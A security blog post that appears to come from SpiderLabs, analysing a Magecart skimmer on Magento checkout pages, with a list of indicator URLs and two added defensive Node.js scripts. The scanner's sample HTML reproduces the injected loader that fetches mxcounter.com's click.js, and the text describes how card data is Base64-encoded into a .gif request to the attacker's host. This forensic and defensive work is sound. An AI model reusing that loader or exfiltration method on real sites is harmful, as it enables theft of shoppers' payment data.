SpiderLabs Blog

Digging Deep Into Magecart Malware

Last week, one of my SpiderLabs colleagues was working on a PCI forensic triage for a website. During his investigation, he asked me to check out some HTTP traffic he had captured during a checkout session on an online retail store.

This was the HTTP capture:

[Image: Untitled-1]

At first glance, the GET request is very suspicious. Firstly, the HTTP Referer URL path contains “/checkout/onepage” (a very common target path in Magecart attacks). Secondly, the GET request goes to a third-party domain (mxcounter.com). And thirdly, it requests a “.GIF” file followed by a long Base64 encoded string.

So I immediately decoded the Base64 string, which resulted in the following:

[Image: Decoded_exfil_data]

Some obvious data exfiltration is going on there!
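The triage above (a Referer on the checkout page, a third-party host, a .GIF request carrying a long Base64 string, then decoding that string) can be automated. The following is an added example, not code from the original post: a small Node.js script that parses a raw HTTP request, scores it against those three indicators and decodes the payload. The request, the merchant host shop.example.com and the field names in the payload are constructed for the example; the card number is a well-known test PAN, not a real card.

```javascript
// Added example (not from the original post): automate the triage of a
// captured checkout-session request. The merchant host, the payload field
// names and the card number (a well-known test PAN) are CONSTRUCTED.
const MERCHANT_HOST = "shop.example.com";

const SAMPLE_PAYLOAD = {
  "billing[firstname]": "Jane",
  "billing[lastname]": "Doe",
  "billing[postcode]": "12345",
  "payment[cc_number]": "4111111111111111",
  "payment[cc_exp_month]": "12",
  "payment[cc_exp_year]": "2021",
  "payment[cc_cid]": "123",
};

// What the skimmer's exfiltration request looks like on the wire: a GET for
// c.gif whose query string is the Base64-encoded JSON of the captured form.
const SAMPLE_REQUEST =
  "GET /c.gif?" +
  Buffer.from(JSON.stringify(SAMPLE_PAYLOAD), "utf8").toString("base64") +
  " HTTP/1.1\r\n" +
  "Host: mxcounter.com\r\n" +
  "Referer: https://shop.example.com/checkout/onepage/\r\n" +
  "User-Agent: Mozilla/5.0\r\n" +
  "\r\n";

// Split a raw HTTP/1.1 request into its request line and a lower-cased
// header map. Only the head is needed; a GET exfiltration has no body.
function parseRequest(raw) {
  const head = raw.split("\r\n\r\n")[0];
  const [requestLine, ...headerLines] = head.split("\r\n");
  const [method, target] = requestLine.split(" ");
  const headers = {};
  for (const line of headerLines) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method, target, headers };
}

// Decode the Base64 query value. The skimmer sends JSON, but fall back to the
// raw text if the payload is not JSON. Percent-encoding is undone first
// because browsers may escape '+', '/' and '=' in a query string.
function decodeBase64Param(value) {
  const text = Buffer.from(decodeURIComponent(value), "base64").toString("utf8");
  try { return JSON.parse(text); } catch (_) { return text; }
}

// Score one request against the three indicators from the post.
function triage(raw, merchantHost) {
  const { method, target, headers } = parseRequest(raw);
  const indicators = [];

  // 1. The Referer points at the merchant's one-page checkout.
  let refererPath = "";
  try { refererPath = new URL(headers.referer || "").pathname; } catch (_) { /* no or invalid Referer */ }
  if (refererPath.includes("/checkout/onepage")) indicators.push("referer-is-checkout-page");

  // 2. The request leaves the merchant's own domain.
  const host = (headers.host || "").toLowerCase();
  if (host && host !== merchantHost.toLowerCase()) indicators.push("third-party-host:" + host);

  // 3. A GET for a .gif whose query string is one long Base64 blob.
  const m = /\.gif\?([A-Za-z0-9+/=%]{40,})$/i.exec(target || "");
  let decoded = null;
  if (method === "GET" && m) {
    indicators.push("gif-with-long-base64-query");
    decoded = decodeBase64Param(m[1]);
  }
  return { indicators, suspicious: indicators.length === 3, decoded };
}

// Mask anything that looks like a PAN before the payload goes into a log,
// ticket or report (PCI DSS forbids storing the full PAN in clear text).
function redactPans(text) {
  return text.replace(/\b\d{13,19}\b/g,
    (d) => d.slice(0, 6) + "*".repeat(d.length - 10) + d.slice(-4));
}

const result = triage(SAMPLE_REQUEST, MERCHANT_HOST);
console.log("suspicious:", result.suspicious, "indicators:", result.indicators.join(", "));
console.log("decoded payload (redacted):");
console.log(redactPans(JSON.stringify(result.decoded, null, 2)));
```

Run it with `node triage.js` against a request pasted from a proxy or packet capture. The three indicators are scored independently so a first-party tracking pixel (same host, no checkout Referer) scores zero, and the decoded payload is masked before it is printed because a forensic report must not carry full card numbers.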

Next, I investigated the HTML source code of the checkout page and found this JavaScript at the bottom of the page, which was not obvious at first:

[Image: InjectedJavascript3]

De-obfuscating the code results in something like this:

[Image: DecodedInjectedJavascript]

Basically what this script does is:

  1. check whether the current page URL contains the string ‘out/onepag’ (a substring of ‘checkout/onepage’)
  2. create a <script> element and point its src at the external script 'https://mxcounter.com/click.js?v=1.7'
  3. append the <script> element to the HTML <head>

In short, it injects an external malicious script into the checkout page.

Checking out the JavaScript code from 'https://mxcounter.com/click.js?v=1.7' uncovers a skimming script, as seen in the image below. This script captures the personal details and credit card data entered by the merchant’s customer on the checkout page. These details are stored in a JavaScript object held in a variable named ‘data’, Base64 encoded, and sent as a URL parameter to https://mxcounter.com/c.gif?<Base64 encoded data> in a GET request, so the image request doubles as the exfiltration channel.

[Image: Mxcounter1]

Looking up mxcounter.com shows that the IP address in its DNS A record is located in Ukraine:

[Image: Mxcounter_whoisrecord]

There are actually multiple versions of this skimming JavaScript on the same domain, which probably cater to different infected online merchants.


For example, here’s version 1.6 of the script:

[Image: Mxcounterv1.9]

and version 1.8:

[Image: Mxcounterv1.8]

and version 2.0, and so on:

[Image: Mxcounter2.0]

So with all this in mind, I was curious to find other websites with similar infections. I first tried Googling “mxcounter.com”, but that didn’t return anything interesting. What I really wanted was to search websites for a string in their HTML source, and I came across nerdydata.com, which can do exactly that.

The search for “mxcounter.com” returned one website:

[Image: Nerdydata_mxcounter]

And sure enough, that website in the search result is infected:

[Image: Infectedwebsite_searchresult]

[Image: Mxcounter2.34]

So I tried a different search string and I searched for a string from the JavaScript code itself:

var img = document.createElement('script')

And there it returned over 40 websites. I checked each of them, and about half were infected with Magecart malware scripts:

[Image: 46website infected]

I also checked most of the exfiltration/skimming URLs, but some of them were already down at the time of this writing. In all of the infected pages, the injected script's source URL is Base64 encoded and decoded at run time with the JavaScript atob() method. For example:

img.src = atob("aHR0cHM6Ly9teGNvdW50ZXIuY29t")

the string “aHR0cHM6Ly9teGNvdW50ZXIuY29t” is the Base64 encoding of https://mxcounter.com.

One of the interesting things I learned during this investigation is that some of these Magecart malware scripts are really sneaky.

Take, for example, this infected retail webpage, into which a loader for a malicious JavaScript hosted on an external host has been injected:

[Image: Mj1]

That Base64 encoded string is actually the URL of the malicious external script source:

[Image: Totally]

Yet, when you visit that URL directly, you get a “503 Service Unavailable” HTTP error:

[Image: Totally2]

However, only when the request carries the expected HTTP headers (User-Agent, Referer and Host) does the server return the malicious JavaScript. Here we used Postman to request the same URL:

[Image: Postman]

This code is still obfuscated; de-obfuscating it reveals the typical checkout-page skimming routine, with exfiltration of the captured data to the attacker’s host.

There are probably numerous other infected websites out there, but here are the exfiltration/skimming JavaScript URLs I compiled during the investigation:

https://adsapigate[.]com/api.js?v=2.6
https://adsapigate[.]com/api.js?v=3.5
https://apitstatus[.]com/api.js?v=2.1.5
https://billgetstatus[.]com/api.js?v=1.6
https://clickdeskstats[.]com/cd.js
https://cloudodesc[.]com/gtm.js?v=1.3
https://cloudodesc[.]com/gtm.js?v=2.1
https://cloudodesc[.]com/gtm.js?v=2.94
https://gtmproc[.]com/gtm.js?v=1.5
https://livecheckpay[.]com/api.js?v=2.3
https://mxcounter[.]com/click.js?v=1.7
https://newrelicnet[.]com/api.js?v=1.2
https://newrelicnet[.]com/api.js?v=1.4
https://newrelicnet[.]com/api.js?v=4.5
https://nr-public[.]com/api.js?v=2.6
https://nr-public[.]com/api.js?v=2.8
https://ordercheckpays[.]com/api.js?v=2.29
https://ordercheckpays[.]com/api.js?v=3.3
https://reactjsapi[.]com/api.js?v=4.2.0
https://tagsmediaget[.]com/api.js?v=1.1.5
https://tagstracking[.]com/tag.js?v=2.1.2
https://tagstracking[.]com/tag.js?v=2.1.4
https://tagstracking[.]com/tag.js?v=2.1.8
https://tagstracking[.]com/tag.js?v=2.2.2
https://tagstracking[.]com/tag.js?v=2.2.4
https://tagstracking[.]com/tag.js?v=2.2.6
https://trust-tracker[.]com/tagtech.js

Most of the infected websites appear to be running old versions of the Magento framework, so exploitation of known Magento vulnerabilities is the most likely cause of the infections, but it is hard to know for sure without further internal investigation. Other possibilities are admin panel brute-force attacks or spear-phishing.

So, if you administer or own an e-commerce website running the Magento platform, you may want to scan your checkout pages for a possible compromise. Look for JavaScript that calls the createElement() method, i.e. "var img = document.createElement('script')", and check whether a Base64 encoded string follows it or whether the JavaScript atob() method is used. You can decode the strings with a Base64 tool such as CyberChef (https://gchq.github.io/CyberChef/). This Base64 string is usually a URL; you should be able to decide whether it is one you expect or one you should suspect.
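The scan described above (find createElement('script'), look for a Base64 string or an atob() call after it, decode it and decide whether the URL is expected) can be scripted against a saved copy of the checkout page. The Node.js script below is an added example, not code from the original post: it pulls inline <script> bodies out of the HTML, decodes every Base64 literal near a createElement('script') call, and reports any decoded URL whose host is not on an allowlist. The sample HTML, the first-party host shop.example.com and the live-chat.js URL are constructed; the loader snippet in it is a shortened version of the de-obfuscated loader described earlier, and its Base64 string decodes to the mxcounter.com click.js URL from the post.

```javascript
// Added example (not from the original post): scan a saved checkout page for
// the loader pattern described in the post. The HTML, the first-party host
// shop.example.com and the live-chat.js URL are CONSTRUCTED for the example.
const ALLOWED_HOSTS = new Set(["shop.example.com"]);

// Base64 of a first-party script URL, built at run time so the sample HTML
// contains one legitimate atob() loader alongside the malicious one.
const FIRST_PARTY_B64 = Buffer.from("https://shop.example.com/js/live-chat.js", "utf8").toString("base64");

const SAMPLE_HTML = `
<html><head><script src="/js/mage/checkout.js"></script></head>
<body>
<!-- first-party tracking pixel: createElement, but not a script -->
<script>var p = document.createElement('img'); p.src = "/stats/pixel.gif";</script>
<!-- injected loader, shortened from the de-obfuscated form in the post -->
<script>
if (window.location.href.indexOf('out/onepag') > -1) {
  var img = document.createElement('script');
  img.src = atob("aHR0cHM6Ly9teGNvdW50ZXIuY29tL2NsaWNrLmpzP3Y9MS43");
  document.head.appendChild(img);
}
</script>
<!-- legitimate lazy loader for a first-party widget -->
<script>var s = document.createElement('script'); s.src = atob("${FIRST_PARTY_B64}"); document.body.appendChild(s);</script>
</body></html>`;

const CREATE_SCRIPT_RE = /document\.createElement\(\s*['"]script['"]\s*\)/;
const ATOB_RE = /atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)/g;
const B64_LITERAL_RE = /['"]([A-Za-z0-9+/]{20,}={0,2})['"]/g;

// Base64-decode a literal and keep it only if the result is an http(s) URL.
function decodeIfUrl(b64) {
  const text = Buffer.from(b64, "base64").toString("utf8");
  if (!/^https?:\/\//i.test(text)) return null;
  try { return new URL(text); } catch (_) { return null; }
}

// Walk every inline <script> in the page. For each one that creates a
// <script> element, decode the Base64 literals in it and report decoded
// URLs whose host is not on the allowlist.
function scanHtml(html, allowedHosts) {
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const findings = [];
  let m, index = 0;
  while ((m = scriptRe.exec(html)) !== null) {
    index += 1;
    const body = m[1];
    if (!CREATE_SCRIPT_RE.test(body)) continue;

    const candidates = new Set();
    for (const re of [ATOB_RE, B64_LITERAL_RE]) {
      re.lastIndex = 0;
      let c;
      while ((c = re.exec(body)) !== null) candidates.add(c[1]);
    }
    const urls = [];
    for (const b64 of candidates) {
      const url = decodeIfUrl(b64);
      if (url) urls.push(url);
    }
    findings.push({
      script: index,
      usesAtob: /\batob\(/.test(body),
      checksCheckoutUrl: /out\/onepag|checkout\/onepage/.test(body),
      decodedUrls: urls.map((u) => u.href),
      unexpectedHosts: urls.filter((u) => !allowedHosts.has(u.hostname)).map((u) => u.hostname),
    });
  }
  return findings;
}

for (const f of scanHtml(SAMPLE_HTML, ALLOWED_HOSTS)) {
  const verdict = f.unexpectedHosts.length ? "SUSPECT" : "ok";
  console.log(`script #${f.script}: ${verdict} atob=${f.usesAtob} checkout-check=${f.checksCheckoutUrl} urls=${f.decodedUrls.join(" ")}`);
}
```

Feed it the HTML you get from the server, not what the browser shows you, since the loader only runs once the page is rendered. The allowlist is what turns "a Base64 URL" into a decision: a first-party lazy loader decodes to your own host and is reported as ok, while the injected loader decodes to mxcounter.com and is flagged. A loader that spells createElement through escapes or string concatenation (as the obfuscated original on the infected site did) will not match the first regex, so treat any inline script that is not part of your checkout template as worth reading by hand.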
